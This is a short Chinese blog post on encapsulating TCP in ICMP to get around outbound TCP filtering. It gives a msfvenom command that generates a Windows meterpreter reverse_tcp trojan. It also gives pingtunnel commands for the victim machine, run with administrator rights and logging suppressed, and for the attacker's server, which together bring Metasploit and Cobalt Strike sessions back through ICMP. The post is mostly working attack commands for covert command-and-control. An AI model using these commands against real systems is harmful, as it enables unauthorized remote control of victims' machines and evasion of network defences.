隧道技术-tcp封装icmp出网

1.背景:

目标出网限制tcp协议

2.msf木马转发上线

生成木马:msfvenom -p windows/meterpreter/reverse_tcp Lhost=127.0.0.1 LPORT=3333 -f exe > msf1.exe

受害机器管理员权限执行:

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.3.195 -t 192.168.3.195:4444 -tcp 1 -noprint 1 -nolog 1

攻击机器执行:

./pingtunnel -type server

使用msf接受tcp协议木马会话

原理:

木马运行在受害主机使用本地3333端口连接,由tcp协议转换未icmp协议数据出网,由kali接收,并且再次转会tcp协议。

3.cs木马转发上线

cs创建监听器:

使用本地的127.0.0.1:9999tcp协议数据使用icmp封装传递给cs服务端。

cs服务端执行:./ping -type server

受害机器执行:

pingtunnel.exe -type client -l 127.0.0.1:9999-s csip -t csip:7777 -tcp 1 -noprint 1 -nolog 1、

相关推荐
曼岛_39 分钟前
[密码学基础]商用密码应用安全性评估(密评):网络安全新风口,高薪紧缺人才必备技能
网络·web安全·密码学·密拼工程师
日月星辰Ace2 小时前
OSI 网络七层模型
网络协议·http·https
Jackilina_Stone3 小时前
【网工第6版】第5章 网络互联①
网络·软考·考试·网络互联·网工
侦探已死4883 小时前
Python 网络编程:TCP 与 UDP 协议详解及实战代码
网络·python·udp·学习笔记·tcp
学网络的APang3 小时前
APang网联科技项目报告(服务器域管理篇)
运维·服务器·网络·科技
颇有几分姿色3 小时前
深入理解路由器、IP地址及网络配置
java·网络·计算机网络
Tony11543 小时前
【eNSP实验】OSPF单区域配置
网络
sky.fly3 小时前
RIP动态路由(三层交换机+单臂路由)
服务器·网络·windows
cnsinda_sdc4 小时前
源代码加密之零日攻击
大数据·网络·安全·web安全
virelin_Y.lin4 小时前
系统与网络安全------弹性交换网络(1)
网络·安全·web安全·vlan·交换机·trunk